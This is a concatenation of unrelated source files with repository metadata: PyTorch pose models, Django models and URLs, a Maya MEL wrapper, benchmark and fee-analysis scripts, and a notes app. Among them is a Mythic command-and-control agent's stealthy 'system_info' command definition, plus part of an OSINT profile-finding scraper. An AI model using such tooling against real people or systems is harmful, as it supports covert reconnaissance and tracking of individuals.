    models the temporal sequence, and a reparameterized latent ``z`` is
    optionally decoded back to poses.

    Args:
        in_channels (int): Number of channels in the input data
        num_class (int): Number of classes for the classification task
        graph_args (dict): The arguments for building the graph
        edge_importance_weighting (bool): If ``True``, adds a learnable
            importance weighting to the edges of the graph
        pose (bool): If ``True``, forward() also decodes predicted poses;
            otherwise it returns only the latent code.
        **kwargs (optional): Other parameters for graph convolution units
    Shape:
        - Input: :math:`(N, in_channels, T_{in}, V_{in}, M_{in})`
        - Output: :math:`(N, num_class)` where
          :math:`N` is a batch size,
          :math:`T_{in}` is a length of input sequence,
          :math:`V_{in}` is the number of graph nodes,
          :math:`M_{in}` is the number of instance in a frame.
    """
    def __init__(self, in_channels, num_class, graph_args,
                 edge_importance_weighting, pose=True, **kwargs):
        super().__init__()
        # pose forecasting or feature only
        self.pose = pose
        self.latent_size = 100
        # load graph; A is registered as a buffer so it moves with the model
        self.graph = Graph(**graph_args)
        A = torch.tensor(self.graph.A, dtype=torch.float32, requires_grad=False)
        self.register_buffer('A', A)
        # build networks
        spatial_kernel_size = A.size(0)
        temporal_kernel_size = 9
        kernel_size = (temporal_kernel_size, spatial_kernel_size)
        self.data_bn = nn.BatchNorm1d(in_channels * A.size(1))
        # Spatial-only GCN stack (s_gcn has its temporal conv disabled).
        self.st_gcn_networks = nn.ModuleList((
            s_gcn(in_channels, 16, kernel_size, 1, residual=False, **kwargs),
            s_gcn(16, 16, kernel_size, 1, **kwargs),
            s_gcn(16, 32, kernel_size, 2, **kwargs),
            s_gcn(32, 32, kernel_size, 1, **kwargs),
            s_gcn(32, 64, kernel_size, 2, **kwargs),
            s_gcn(64, 64, kernel_size, 1, **kwargs),
            s_gcn(64, 64, kernel_size, 1, **kwargs),
            #s_gcn(128, 256, kernel_size, 2, **kwargs),
            #s_gcn(256, 256, kernel_size, 1, **kwargs),
            #s_gcn(256, 256, kernel_size, 1, **kwargs),
        ))
        # initialize parameters for edge importance weighting
        if edge_importance_weighting:
            self.edge_importance = nn.ParameterList([
                nn.Parameter(torch.ones(self.A.size()))
                for i in self.st_gcn_networks
            ])
        else:
            self.edge_importance = [1] * len(self.st_gcn_networks)
        # single LSTM over per-frame features (25 joints x 64 channels)
        self.lstm = nn.LSTM(25*64, 25*64, 3, batch_first = True)
        # encode to mean and (log-)variance of the latent distribution
        self.mean_fc = nn.Linear(25*64, self.latent_size)
        self.var_fc = nn.Linear(25*64, self.latent_size)
        # decoder: latent -> 75 values (presumably 25 joints x 3 coords -- TODO confirm)
        self.decod_fc1 = nn.Linear(100, 100)
        self.decod_fc2 = nn.Linear(100, 75)
    def forward(self, x):
        # data normalization
        N, C, T, V, M = x.size() # 1, 3, T, 25, M
        #x = x.permute(0, 4, 3, 1, 2).contiguous()
        #x = x.view(N * M, V * C, T)
        #x = self.data_bn(x)
        #x = x.view(N, M, V, C, T) # 1, M, 25, 3, T
        #x = x.permute(0, 1, 3, 4, 2).contiguous()
        x = x.permute(0, 4, 1, 2, 3).contiguous()
        x = x.view(N * M, C, T, V) # BxM, 3, T, 25
        #get batch of frames: fold time into the batch so the GCNs see
        #single-frame graphs
        x = x.permute(0, 2, 1, 3).contiguous()
        x = x.view(N * M * T, C, 1, V) # BxMxT, 3, 1, 25
        # forward
        for gcn, importance in zip(self.st_gcn_networks, self.edge_importance):
            x, _ = gcn(x, self.A * importance)
        x = x.view(N*M, T, 64*25)
        # sample
        # NOTE(review): hard-codes CUDA; this forward fails on CPU-only runs.
        samp = torch.randn([N*M, self.latent_size]).cuda()
        # pass to an LSTM
        x, _ = self.lstm(x)
        means = self.mean_fc(x)
        varis = self.var_fc(x)
        # Reparameterization trick: z = mu + sigma * eps, sigma = exp(varis/2)
        stds = torch.exp(0.5 * varis)
        z = samp * stds + means
        if self.pose:
            y = self.decod_fc1(z)
            predicted = self.decod_fc2(y)
            predicted = predicted.view(N, C, T, V, M)
            return predicted, means, varis, z
        else:
            return z
    def extract_avg_feature(self, x):
        # data normalization
        N, C, T, V, M = x.size()
        x = x.permute(0, 4, 3, 1, 2).contiguous()
        x = x.view(N * M, V * C, T)
        x = self.data_bn(x)
        x = x.view(N, M, V, C, T)
        x = x.permute(0, 1, 3, 4, 2).contiguous()
        x = x.view(N * M, C, T, V)
        # forward through the GCN stack
        for gcn, importance in zip(self.st_gcn_networks, self.edge_importance):
            x, _ = gcn(x, self.A * importance)
        # global pooling
        x = F.avg_pool2d(x, x.size()[2:])
        x = x.view(N, M, -1, 1, 1).mean(dim=1)
        feature = x
        feature = feature.view(N, -1)
        # prediction
        # NOTE(review): self.fcn is never defined in __init__, so this method
        # raises AttributeError if called -- confirm whether it is dead code.
        x = self.fcn(x)
        x = x.view(x.size(0), -1)
        return x, feature
    def extract_feature(self, x):
        # data normalization
        N, C, T, V, M = x.size()
        x = x.permute(0, 4, 3, 1, 2).contiguous()
        x = x.view(N * M, V * C, T)
        x = self.data_bn(x)
        x = x.view(N, M, V, C, T)
        x = x.permute(0, 1, 3, 4, 2).contiguous()
        x = x.view(N * M, C, T, V)
        # forward through the GCN stack
        for gcn, importance in zip(self.st_gcn_networks, self.edge_importance):
            x, _ = gcn(x, self.A * importance)
        _, c, t, v = x.size()
        feature = x.view(N, M, c, t, v).permute(0, 2, 3, 4, 1)
        # prediction
        # NOTE(review): self.fcn is never defined in __init__ (see above).
        x = self.fcn(x)
        output = x.view(N, M, -1, t, v).permute(0, 2, 3, 4, 1)
        return output, feature
class st_gcn(nn.Module):
    r"""Applies a spatial temporal graph convolution over an input graph sequence.
    Args:
        in_channels (int): Number of channels in the input sequence data
        out_channels (int): Number of channels produced by the convolution
        kernel_size (tuple): Size of the temporal convolving kernel and graph convolving kernel
        stride (int, optional): Stride of the temporal convolution. Default: 1
        dropout (int, optional): Dropout rate of the final output. Default: 0
        residual (bool, optional): If ``True``, applies a residual mechanism. Default: ``True``
    Shape:
        - Input[0]: Input graph sequence in :math:`(N, in_channels, T_{in}, V)` format
        - Input[1]: Input graph adjacency matrix in :math:`(K, V, V)` format
        - Output[0]: Output graph sequence in :math:`(N, out_channels, T_{out}, V)` format
        - Output[1]: Graph adjacency matrix for output data in :math:`(K, V, V)` format
        where
            :math:`N` is a batch size,
            :math:`K` is the spatial kernel size, as :math:`K == kernel_size[1]`,
            :math:`T_{in}/T_{out}` is a length of input/output sequence,
            :math:`V` is the number of graph nodes.
    """
    def __init__(self,
                 in_channels,
                 out_channels,
                 kernel_size,
                 stride=1,
                 dropout=0,
                 residual=True):
        super().__init__()
        # kernel_size = (temporal, spatial); the temporal size must be odd
        # so that 'same' padding is symmetric.
        assert len(kernel_size) == 2
        assert kernel_size[0] % 2 == 1
        padding = ((kernel_size[0] - 1) // 2, 0)
        # Spatial graph convolution followed by a temporal convolution.
        self.gcn = ConvTemporalGraphical(in_channels, out_channels,
                                         kernel_size[1])
        self.tcn = nn.Sequential(
            nn.BatchNorm2d(out_channels),
            nn.ReLU(inplace=True),
            nn.Conv2d(
                out_channels,
                out_channels,
                (kernel_size[0], 1),
                (stride, 1),
                padding,
            ),
            nn.BatchNorm2d(out_channels),
            nn.Dropout(dropout, inplace=True),
        )
        # Residual branch: zero when disabled, identity when the shapes
        # match, otherwise a strided 1x1 convolution + batch-norm.
        if not residual:
            self.residual = lambda x: 0
        elif (in_channels == out_channels) and (stride == 1):
            self.residual = lambda x: x
        else:
            self.residual = nn.Sequential(
                nn.Conv2d(
                    in_channels,
                    out_channels,
                    kernel_size=1,
                    stride=(stride, 1)),
                nn.BatchNorm2d(out_channels),
            )
        self.relu = nn.ReLU(inplace=True)
    def forward(self, x, A):
        # y = ReLU(tcn(gcn(x)) + residual(x)); A is returned unchanged.
        res = self.residual(x)
        x, A = self.gcn(x, A)
        x = self.tcn(x) + res
        return self.relu(x), A
class s_gcn(nn.Module):
    r"""Spatial-only variant of st_gcn: the temporal convolution (tcn) is
    intentionally disabled (kept commented out below), so the module applies
    just the spatial graph convolution plus the residual connection.
    Args:
        in_channels (int): Number of channels in the input sequence data
        out_channels (int): Number of channels produced by the convolution
        kernel_size (tuple): Size of the temporal convolving kernel and graph convolving kernel
        stride (int, optional): Stride of the temporal convolution. Default: 1
        dropout (int, optional): Dropout rate of the final output. Default: 0
        residual (bool, optional): If ``True``, applies a residual mechanism. Default: ``True``
    Shape:
        - Input[0]: Input graph sequence in :math:`(N, in_channels, T_{in}, V)` format
        - Input[1]: Input graph adjacency matrix in :math:`(K, V, V)` format
        - Output[0]: Output graph sequence in :math:`(N, out_channels, T_{out}, V)` format
        - Output[1]: Graph adjacency matrix for output data in :math:`(K, V, V)` format
        where
            :math:`N` is a batch size,
            :math:`K` is the spatial kernel size, as :math:`K == kernel_size[1]`,
            :math:`T_{in}/T_{out}` is a length of input/output sequence,
            :math:`V` is the number of graph nodes.
    """
    def __init__(self,
                 in_channels,
                 out_channels,
                 kernel_size,
                 stride=1,
                 dropout=0,
                 residual=True):
        super().__init__()
        assert len(kernel_size) == 2
        assert kernel_size[0] % 2 == 1
        padding = ((kernel_size[0] - 1) // 2, 0)
        self.gcn = ConvTemporalGraphical(in_channels, out_channels,
                                         kernel_size[1])
        # Temporal convolution deliberately disabled for this variant.
        # self.tcn = nn.Sequential(
        # nn.BatchNorm2d(out_channels),
        # nn.ReLU(inplace=True),
        # nn.Conv2d(
        # out_channels,
        # out_channels,
        # (kernel_size[0], 1),
        # (stride, 1),
        # padding,
        # ),
        # nn.BatchNorm2d(out_channels),
        # nn.Dropout(dropout, inplace=True),
        # )
        # Residual branch: zero / identity / strided 1x1 conv, as in st_gcn.
        if not residual:
            self.residual = lambda x: 0
        elif (in_channels == out_channels) and (stride == 1):
            self.residual = lambda x: x
        else:
            self.residual = nn.Sequential(
                nn.Conv2d(
                    in_channels,
                    out_channels,
                    kernel_size=1,
                    stride=(stride, 1)),
                nn.BatchNorm2d(out_channels),
            )
        self.relu = nn.ReLU(inplace=True)
    def forward(self, x, A):
        # y = ReLU(gcn(x) + residual(x)); no temporal convolution applied.
        res = self.residual(x)
        x, A = self.gcn(x, A)
        x = x + res
        return self.relu(x), A
|
[
"qdhuangzhengjia@126.com"
] |
qdhuangzhengjia@126.com
|
cac54f9c3610a1187fec20f24debef77a07c6be6
|
4e34eeec2783ab853388a322d7ff29c208f54f24
|
/python/cymel/utils/melgvar.py
|
c1a0afe4e26c6014fa9f476cb17d32b97e94d0ed
|
[
"MIT"
] |
permissive
|
cia-rana/cymel
|
faa3d404e3aacd9b78960638fe0075ea06224bd0
|
1fb749e53d75afb2857c15b54a2f03b0f7859062
|
refs/heads/main
| 2022-12-29T19:01:41.372196
| 2020-10-19T03:08:36
| 2020-10-19T03:08:36
| 305,246,996
| 0
| 0
|
MIT
| 2020-10-19T02:56:18
| 2020-10-19T02:56:17
| null |
UTF-8
|
Python
| false
| false
| 1,748
|
py
|
# -*- coding: utf-8 -*-
u"""
MELグローバル変数ラッパー。
"""
from ..pyutils import Singleton
import maya.mel as mel
__all__ = ['MelVar', 'melvar']
_mel_eval = mel.eval
#------------------------------------------------------------------------------
class MelVar(object):
    u"""
    Read-only, dict-like wrapper around MEL global variables.

    The single instance `melvar` is created below. Lookups evaluate the
    corresponding MEL global via ``mel.eval``; setting or deleting entries
    is not supported.
    """
    __metaclass__ = Singleton  # NOTE: Python-2 style metaclass; no effect on Python 3.

    def __contains__(self, key):
        # MEL's env() returns variable names with their leading '$'.
        return ('$' + key) in _mel_eval('env()')

    def has_key(self, key):
        # Python-2 style alias of __contains__.
        return ('$' + key) in _mel_eval('env()')

    def __len__(self):
        return len(_mel_eval('env()'))

    def __iter__(self):
        # Yield variable names without the leading '$'.
        for k in _mel_eval('env()'):
            yield k[1:]

    def __getitem__(self, key):
        try:
            # Assigning a MEL global to itself makes eval return its value.
            return _mel_eval('$%s=$%s' % (key, key))
        except RuntimeError:
            raise KeyError(key)

    def __setitem__(self, key, val):
        # Typo fixed: was "surported".
        raise TypeError('setter is not supported')

    def __delitem__(self, key):
        # Typo fixed: was "surported".
        raise TypeError('deleter is not supported')

    def keys(self):
        for k in _mel_eval('env()'):
            yield k[1:]

    def values(self):
        # Keys from env() already carry the '$' prefix.
        for k in _mel_eval('env()'):
            yield _mel_eval('%s=%s' % (k, k))

    def items(self):
        for k in _mel_eval('env()'):
            yield k[1:], _mel_eval('%s=%s' % (k, k))

    def get(self, key, default=None):
        """Return the value of MEL global *key*, or *default* if absent."""
        try:
            return _mel_eval('$%s=$%s' % (key, key))
        except RuntimeError:
            return default
melvar = MelVar()  #: The sole `MelVar` instance.
|
[
"20365380+ryusas@users.noreply.github.com"
] |
20365380+ryusas@users.noreply.github.com
|
3b4258e2f4a96a8a96e4dbb400445ef2960b50fb
|
5b074b495a4954f23551e724906d76797d89e346
|
/stream/stream_scpt
|
9b1f474a551e233af36cd1ac52868502918eeaaf
|
[] |
no_license
|
m-conklin/docker-benchmarking
|
c75b7e7a2049a0cf95e9eaa9ac4571728a793b40
|
d26a69e8d5d752a5919b04878f1effb7d4388e76
|
refs/heads/master
| 2020-05-15T09:47:14.964534
| 2015-05-07T21:21:52
| 2015-05-07T21:21:52
| 34,288,955
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 934
|
#!/usr/bin/python
# Run the STREAM memory-bandwidth benchmark several times and split its
# per-kernel results (Copy/Scale/Add/Triad) into one CSV file each.
import subprocess
def initialize_file(f):
    # Write the CSV header row for one result file.
    f.write('Rate (MB/s),Avg time,Min time,Max time \n')
def run_stream(times):
    # Run the benchmark binary `times` times, sending its stdout to the
    # module-global `writeout` handle (opened below, before this is called).
    for i in range(times):
        subprocess.call('./stream_c.exe', stdout=writeout)
copy = open('copy_results.csv', 'a')
scale = open('scale_results.csv', 'a')
add = open('add_results.csv', 'a')
triad = open('triad_results.csv', 'a')
files = [copy, scale, add, triad]
for f in files:
    initialize_file(f)
# NOTE(review): `output` is opened before run_stream() writes anything; this
# works because the child processes write directly to writeout's OS-level
# file descriptor -- confirm writeout needn't be flushed/closed first.
writeout = open('out.txt', 'w')
output = open('out.txt', 'r')
run_stream(5)
for line in output:
    # Lines look like "Copy:  rate  avg  min  max"; dispatch on the label.
    line = line.split()
    f = line[0].lower()
    if f == 'copy:':
        copy.write(",".join(line[1:]) + '\n')
    elif f == 'scale:':
        scale.write(",".join(line[1:]) + '\n')
    elif f == 'add:':
        add.write(",".join(line[1:]) + '\n')
    elif f == 'triad:':
        triad.write(",".join(line[1:]) + '\n')
output.close()
for f in files:
    f.close()
|
[
"mjmc@uvic.ca"
] |
mjmc@uvic.ca
|
|
7c4a9c9289253642281c4520d51df84727bed704
|
88bd85d5cd9e9b29d5e58826963bf51da4eb1a73
|
/trip_project/trip_project/trip_app/models.py
|
83dac62812bed7e4707b4990b6ee958aa208e4ce
|
[] |
no_license
|
YasaswiPoolla/portal
|
954e4364575bbc09370bd019474460e19508d03d
|
61cbc7159113fa77f79483f33c370cc68da345e1
|
refs/heads/master
| 2022-11-20T03:35:31.497680
| 2020-07-23T05:40:54
| 2020-07-23T05:40:54
| 275,518,924
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,596
|
py
|
from django.db import models
from django.contrib.postgres.fields import JSONField
from django.contrib.auth.base_user import AbstractBaseUser
from trip_project.trip_app.model_managers import UserManager
import os
# Create your models here.
class User(AbstractBaseUser):
    """Custom user model keyed by email (USERNAME_FIELD), managed by UserManager."""
    objects = UserManager()
    user_sqn = models.BigAutoField(primary_key=True)
    first_name = models.CharField(max_length=50, db_column="firstname")
    last_name = models.CharField(max_length=50, db_column="lastname")
    email = models.EmailField(unique=True)
    mobile = models.CharField(max_length=20, db_column="mobile")
    last_login = models.DateTimeField(db_column="last_login", auto_now_add=True)
    # Accounts start inactive (presumably until activation -- confirm flow).
    is_active = models.BooleanField(default=False, db_column="isActive")
    # NOTE(review): a lambda upload_to cannot be serialized by Django
    # migrations -- confirm; a module-level function would be needed.
    profile_image = models.FileField(blank=True, null=True,upload_to=lambda instance, filename: '{0}_{1}/profile/{2}'.format(instance.first_name, instance.user_sqn, filename))
    USERNAME_FIELD = "email"
    REQUIRED_FIELDS = []
class UserException(models.Model):
    """Error-log entry: the request payload and stack trace of a failure."""
    exception_sqn = models.BigAutoField(primary_key=True)
    # Nullable: exceptions can occur for anonymous requests.
    user = models.ForeignKey(User, on_delete=models.PROTECT, db_column="user_sqn", null=True)
    user_request = JSONField()
    stack_trace = models.TextField()
    log_datetime = models.DateTimeField(db_column="logDateTime", auto_now_add=True)
    status = models.BooleanField(default=False)
class Trips(models.Model):
    """A user's trip between two named locations."""
    trip_sqn = models.BigAutoField(primary_key=True)
    from_location = models.CharField(max_length=50, db_column="fromlocation")
    to_location = models.CharField(max_length=50, db_column="tolocation")
    trip_date = models.DateTimeField(db_column="tripdate", auto_now_add=True)
    trip_distance = models.BigIntegerField(null=True,db_column="tripdistance")
    trip = models.ForeignKey
    user = models.ForeignKey(User, on_delete=models.PROTECT, db_column="user_sqn")
class Locations(models.Model):
    """A geo-tagged waypoint recorded along a trip."""
    location_sqn = models.BigAutoField(primary_key=True)
    latitude = models.DecimalField(max_digits=9, decimal_places=6)
    longitude = models.DecimalField(max_digits=9, decimal_places=6)
    created_date = models.DateTimeField(db_column="at_location", auto_now_add=True,null=True,blank=True)
    location_name = models.CharField(max_length=50, db_column="locationname")
    trip = models.ForeignKey(Trips, on_delete=models.PROTECT, db_column="trip_sqn")
class TripImages(models.Model):
    """Photos attached to a trip; files are stored under MEDIA_ROOT/memories."""
    images_sqn = models.BigAutoField(primary_key=True)
    images = models.FileField(blank=True, null=True,upload_to='memories')
    trip = models.ForeignKey(Trips, on_delete=models.PROTECT, db_column="trip_sqn")
|
[
"yasaswi.poolla@itcrats.com"
] |
yasaswi.poolla@itcrats.com
|
201b1db04ac60fa983e1f615ea2c91f55878b0e8
|
5af4814716bb56d1d941938ccc0b69c2297901ce
|
/main/urls.py
|
832fd55cf43bfae923400a70ac62e8b1067a5d07
|
[
"MIT"
] |
permissive
|
geosoco/coding_experiment
|
5f6ea8204c0043d45cbcf21de3934db12c162dd0
|
bd17b703c3ba7a3de59ffc846fbcbbdb42fa8a77
|
refs/heads/master
| 2021-01-18T22:40:27.486559
| 2015-08-20T06:43:21
| 2015-08-20T06:43:21
| 32,149,899
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,726
|
py
|
from django.conf import settings
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.contrib.auth.decorators import login_required, permission_required
from main.views import *
# URL routes for the main app (legacy string-view syntax).
# NOTE(review): django.conf.urls.patterns() was removed in Django 1.10;
# this file targets an older Django release -- confirm project version.
urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'coding_experiments.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),
    #url(r'^$', 'main.views.home', name='home'),
    url(r'^landing/(?P<cnd>\d+)/$', 'main.views.landing', name='landing'),
    url(r'^landing/$', 'main.views.landing', name='landing'),
    url(r'^instructions/$', 'main.views.instructions', name='instructions'),
    url(r'^instructions/(?P<page>\d+)/$', 'main.views.instructions', name='instructions'),
    url(r'^coding/((?P<page>\d+)/|)$', 'main.views.coding', name='coding'),
    url(r'^thanks/$', 'main.views.thanks', name='thanks'),
    url(r'^validate/((?P<page>\d+)/|)$', 'main.views.validate', name='validate'),
    url(r'^survey/pre/$', 'main.views.pre_survey', name='pre_survey'),
    url(r'^survey/post/$', 'main.views.post_survey', name='post_survey'),
    url(r'^reqcheck/$', 'main.views.req_check', name='req_check'),
    url(r'^instructioncheck/$', InstructionCheck.as_view(), name='instruction_check'),
    url(r'^pause/$', 'main.views.bonus_check', name='bonus_check'),
    url(r'^$', HomeView.as_view(), name='user_home'),
    url(r'^coding2/(?P<assignment_id>\d+)/$', UserCodingView2.as_view(), name='user_coding'),
    url(r'^login/$', 'django.contrib.auth.views.login'),
    url(r'^logout/$', 'django.contrib.auth.views.logout'),
)
# Mount the debug toolbar only in development.
if settings.DEBUG:
    import debug_toolbar
    urlpatterns += patterns('',
        url(r'^__debug__/', include(debug_toolbar.urls)),
    )
|
[
"soco@uw.edu"
] |
soco@uw.edu
|
16d6a6a7cfe30d87484fca8b87ca9ea6071ced6e
|
4bcb3335cb1defafeadda7c5f1641b772dcfd105
|
/Payload_Types/apfell/mythic/agent_functions/system_info.py
|
ceccb71f3dee17a3ed9b21322332461b415d84af
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
axax002/Mythic
|
664f7714ea6181b5d4e82a49b7ca5e09d3781c9c
|
7614ab8f809d8108a4f5cf13c926f3ffbc1eb4a7
|
refs/heads/master
| 2022-12-15T00:08:00.149526
| 2020-09-09T16:10:15
| 2020-09-09T16:10:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 951
|
py
|
from CommandBase import *
import json
class SystemInfoArguments(TaskArguments):
    """Argument container for system_info; the command takes no arguments."""

    def __init__(self, command_line):
        super().__init__(command_line)
        self.args = dict()

    async def parse_arguments(self):
        # system_info accepts no arguments, so parsing is a no-op.
        pass
class SystemInfoCommand(CommandBase):
    """Mythic command definition for the apfell agent's `system_info` task."""
    cmd = "system_info"
    needs_admin = False
    help_cmd = "system_info"
    description = "This uses JXA to get some system information. It doesn't send Apple Events to any other applications though, so it shouldn't cause popups."
    version = 1
    is_exit = False
    is_file_browse = False
    is_process_list = False
    is_download_file = False
    is_remove_file = False
    is_upload_file = False
    author = "@its_a_feature_"
    # MITRE ATT&CK mapping: T1082 (System Information Discovery).
    attackmapping = ["T1082"]
    argument_class = SystemInfoArguments
    async def create_tasking(self, task: MythicTask) -> MythicTask:
        # No server-side transformation is needed; pass the task through.
        return task
    async def process_response(self, response: AgentResponse):
        # Agent responses require no extra processing.
        pass
|
[
"codybthomas@gmail.com"
] |
codybthomas@gmail.com
|
9a2a89571629f1ba6411e3d1debcf55c992f304a
|
b413c51273a6cf4e5d4e9fa5a618d16c73379627
|
/NotesCmd/NotesCmd/NotesCmd.py
|
d974f9c59d8ab39f87bb3673c43daba40a88fba2
|
[] |
no_license
|
CorvusEtiam/gSimpleNotes
|
038ea5e38a3e76406dc3ab713a1537707f7c7745
|
76659610db641f84b3b185a0347a31a58dcd6769
|
refs/heads/master
| 2021-05-28T07:38:55.702153
| 2012-08-22T12:19:05
| 2012-08-22T12:19:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,704
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
### ::FUNCTION :: ###
def number_of_line():
    """Return the number of numbered note lines in Notes.txt.

    Blank lines and '@'-prefixed marker lines are excluded, since only
    regular notes receive a "[n] " number prefix when written.

    Fixes two bugs in the original: ``line.strip() != False`` was always
    True (a string never equals False), and ``line[1]`` tested the second
    character, so '@'-marker lines were still counted.
    """
    count = 0
    with open("Notes.txt", "r") as notes:
        for line in notes:
            stripped = line.strip()
            # Count only non-blank lines that are not '@' markers.
            if stripped and not stripped.startswith("@"):
                count += 1
    return count
#########################
### DELETE LINES ###
#########################
def delete(x):
    """Delete the first *x* lines of Notes.txt, keeping the rest.

    Fixes the original, which wrote ``"%s\\n" % item`` even though
    readlines() keeps each line's trailing newline, so every retained
    line gained an extra blank line on each call.
    """
    with open("Notes.txt","r") as f:
        items = f.readlines()
    with open("Notes.txt","w") as out:
        # Lines already end with '\n'; write them back verbatim.
        out.writelines(items[x:])
#########################
# Interactive menu loop (Python 2: `print` statement and raw_input).
print "Wybierz\n"
print "|A|dd line\n|R|ead Note File\n|D|elete\n|Q|uit"
choice = "n"
#########################
while choice.lower() != "q":
    choice = raw_input("Twoj wybor:\t")
    if choice.lower() == "a":
        text = raw_input("Podaj notatke. ENTER konczy\n\n")
        with open("Notes.txt","a") as notefile:
            # Next note number = current numbered-line count + 1.
            NOL = number_of_line()+1
            # NOTE(review): empty input makes text[0] raise IndexError.
            if text[0] != '@':
                notefile.write("["+str(NOL)+"] "+text+"\n")
            else:
                # '@'-prefixed lines are stored verbatim, without a number.
                notefile.write(text+"\n")
        continue
    elif choice.lower() == "r" :
        # Dump the whole notes file to the console.
        notefile = open("Notes.txt","r")
        print notefile.read()
        notefile.close()
        continue
    elif choice.lower() == "d":
        # Remove the first N lines of the file.
        x = raw_input("Ile linii usunac?")
        delete(int(x))
        continue
    else:
        continue
|
[
"misiek.rybicki@gmail.com"
] |
misiek.rybicki@gmail.com
|
f167be233949bfb768555958776936a25182c8af
|
7c9ad91cdec19680ead79d76eed51e79b2dc9d07
|
/code/vs/feeanalyzer.py
|
38d10aeb18737f1b7c1b2044394267e1a6a00093
|
[
"MIT"
] |
permissive
|
renepickhardt/Imbalance-measure-and-proactive-channel-rebalancing-algorithm-for-the-Lightning-Network
|
d6183f398af05b35b31e8a8a55ceb673afb34618
|
0a2613b5e94185b68869962cdf13a19053adfdd8
|
refs/heads/master
| 2020-09-19T03:32:11.037387
| 2020-05-06T17:22:15
| 2020-05-06T17:22:15
| 224,196,298
| 9
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 524
|
py
|
import matplotlib.pyplot as plt
import numpy as np

# Histogram the per-payment fees produced by the rebalancing experiment.
# Each line of the results file is "<key>\t<fee>"; l[:-1] drops the newline.
f = open("finalResults/fullExperimentNonStrictRebalancing/better_balanced_directed_lightning_network_fees_3_5000_fees", "r")
fees = []
for l in f:
    fee = float(l[:-1].split("\t")[1])
    if abs(fee) > 100000:
        # Outliers are printed for inspection and excluded from the histogram.
        print(fee)
    else:
        fees.append(fee)
print(max(fees))

# Sanity check the network description: report any channel whose 6th
# tab-separated field exceeds 100000.
# NOTE(review): field index 5 is presumed to be the base fee — confirm the
# file schema.
f = open("directed_lightning_network", "r")
for l in f:
    base = int(l[:-1].split("\t")[5])
    if base > 100000:
        print(base)

plt.hist(fees, bins=20)
plt.grid()
plt.show()
#
|
[
"r.pickhardt@gmail.com"
] |
r.pickhardt@gmail.com
|
2ff71f9e8d27959860fa92a8f3b988dbfe9f0b0f
|
9bf28e7a926046d1d30fb4a7c8eb4733e7e77bbf
|
/vim/pythonx/cpp_file_navigator.py
|
0f71edec6339070c600b7e8ccc3649b1468abdb5
|
[] |
no_license
|
KKoovalsky/dotfiles
|
c3f7dd453760a7f101358aff7ff2a0f473d84c9d
|
62a803724a0cddb55781387271f348072812b377
|
refs/heads/master
| 2023-08-04T19:17:39.883223
| 2023-08-01T09:35:46
| 2023-08-01T09:35:46
| 199,640,579
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,643
|
py
|
import clang.cindex as clcidx
import os
import itertools
def find_last_line_of_constructor(class_name, source_file):
    """Return the 1-based line on which the first constructor of
    *class_name* found in *source_file* ends.

    Raises StopIteration when the file declares no matching constructor.
    """
    ctor = _get_first_node_that_matches(
        _is_constructor_of_class(class_name), source_file)
    return ctor.extent.end.line
def find_class_name_of_method_at_line(header_file, method_line_num):
    """Return the display name of the class that declares the C++ method
    starting at *method_line_num* in *header_file*."""
    method_cursor = _find_method_at_line(header_file, method_line_num)
    return method_cursor.semantic_parent.displayname
def _find_method_at_line(source_file, line_number):
    """Return the cursor of the C++ method whose extent starts exactly at
    *line_number* in *source_file* (StopIteration if none)."""
    return _get_first_node_that_matches(_is_method_at_line(line_number),
                                        source_file)
def _get_first_node_that_matches(predicate, source_file):
    """Return the first AST node in *source_file* satisfying *predicate*.

    Raises StopIteration when no node matches.
    """
    top_level_nodes = _get_translation_unit_nodes_from_file(source_file)
    return next(_filter_nodes(top_level_nodes, predicate))
def _get_translation_unit_nodes_from_file(source_file):
    """Parse *source_file* with libclang and return an iterator over the
    translation unit's top-level cursors that belong to the file itself.

    Cursors coming from #include'd headers are filtered out by comparing
    the cursor's file name against *source_file*'s basename.
    """
    index = clcidx.Index.create()
    tu = index.parse(source_file)
    filename = os.path.split(source_file)[-1]
    return filter(lambda x: x.location.file.name.endswith(filename),
                  tu.cursor.get_children())
def _filter_nodes(nodes_it, predicate):
list_with_filtered = [
filter(predicate, node.walk_preorder()) for node in nodes_it]
return itertools.chain.from_iterable(list_with_filtered)
def _is_constructor_of_class(class_name):
    """Return a predicate matching constructor cursors whose display name
    mentions *class_name*.

    NOTE(review): the substring test may also match constructors of classes
    whose names merely contain *class_name* (e.g. `FooBar` for `Foo`).
    """
    return lambda node: node.kind == clcidx.CursorKind.CONSTRUCTOR and \
        '{}'.format(class_name) in node.displayname
def _is_method_at_line(line_number):
    """Return a predicate matching C++ method cursors whose extent starts
    exactly at *line_number*."""
    return lambda node: node.kind == clcidx.CursorKind.CXX_METHOD and \
        node.extent.start.line == line_number
|
[
"kacper.s.kowalski@gmail.com"
] |
kacper.s.kowalski@gmail.com
|
d2f2360b665e61c0e762037780f94210527ad4a7
|
b642c19ce7c6c14ef88f2b3fa1a05dac99146367
|
/profil3r/modules/hosting/aboutme.py
|
56da907ef20b7b6944a1b53ca3a0e41072fa60fc
|
[] |
no_license
|
Sahildholpuria/ProfileFinder
|
6212e59df89bfb454483d3930619d0ee828fb921
|
9ea517e961f48c98f234ccdc618ebea3f0f3455c
|
refs/heads/master
| 2023-06-17T08:17:27.337052
| 2021-07-20T04:30:47
| 2021-07-20T04:30:47
| 387,668,051
| 9
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,773
|
py
|
import requests
from bs4 import BeautifulSoup
import time
class AboutMe:
    """Enumerate candidate about.me profile URLs for a set of username
    permutations and scrape basic profile details from the ones that exist.
    """

    def __init__(self, config, permutations_list):
        # Rate limit is configured in milliseconds; we sleep this many
        # seconds between requests.
        self.delay = config['plateform']['aboutme']['rate_limit'] / 1000
        # https://about.me/{username}
        self.format = config['plateform']['aboutme']['format']
        self.permutations_list = permutations_list
        # hosting
